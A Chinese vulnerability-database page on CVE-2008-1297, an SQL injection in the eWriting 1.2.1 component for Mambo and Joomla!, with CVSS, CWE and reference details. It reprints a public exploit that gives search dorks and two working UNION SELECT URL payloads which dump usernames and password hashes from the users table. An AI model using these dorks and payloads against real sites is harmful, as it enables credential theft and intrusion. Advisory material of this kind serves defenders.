微慑信息网

CVE-2008-1297-漏洞详情

CVE-2008-1297
CVSS 7.5
发布时间 :2008-03-12 13:44:00
修订时间 :2008-09-05 17:37:22
NMCOE    

[原文]SQL injection vulnerability in index.php in the eWriting (com_ewriting) 1.2.1 module for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a selectcat action.


[CNNVD]Mambo Com_ewriting ‘index.php’ SQL注入漏洞(CNNVD-200803-189)

        Mambo 和Joomla! eWriting (com_ewriting)模块的index.php存在SQL注入漏洞。远程攻击者通过一个selectcat操作中的cat参数来执行任意SQL命令。


CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]


CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]


CPE (受影响的平台与产品)

cpe:/a:mambo:com_ewriting:1.2.1
cpe:/a:joomla:com_ewriting:1.2.1
cpe:/a:ewriting:ewriting:1.2.1


OVAL (用于检测的技术细节)

未找到相关OVAL定义


官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1297

(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1297

(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-189

(官方数据源) CNNVD


其它链接及资源

http://www.securityfocus.com/bid/28179


(UNKNOWN)  BID  28179
http://www.milw0rm.com/exploits/5226


(UNKNOWN)  MILW0RM  5226
http://secunia.com/advisories/29292


(VENDOR_ADVISORY)  SECUNIA  29292


漏洞信息

Mambo Com_ewriting ‘index.php’ SQL注入漏洞
高危 SQL注入
2008-03-12 00:00:00 2008-09-05 00:00:00
本地  
        Mambo 和Joomla! eWriting (com_ewriting)模块的index.php存在SQL注入漏洞。远程攻击者通过一个selectcat操作中的cat参数来执行任意SQL命令。


公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:


        http://www.joomla.org/


漏洞信息 (5226)

Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability
(EDBID:5226)
php webapps
2008-03-10 Verified
0 Don

N/A

[点击下载]

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don

# BHack

# b4lc4n.org

# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]
  


漏洞信息


42727
eWriting Component for Mambo / Joomla! index.php cat Parameter SQL Injection

Remote / Network Access

Information Disclosure,
Input Manipulation
Loss of Confidentiality,
Loss of Integrity
Exploit Public Uncoordinated Disclosure


漏洞描述

eWriting Component for Mambo / Joomla! contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'index.php' not properly sanitizing user-supplied input to the 'cat' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.


时间线


2008-03-10

Unknow
2008-03-10 Unknow


解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.


相关参考


漏洞作者

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2008-1297-漏洞详情

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册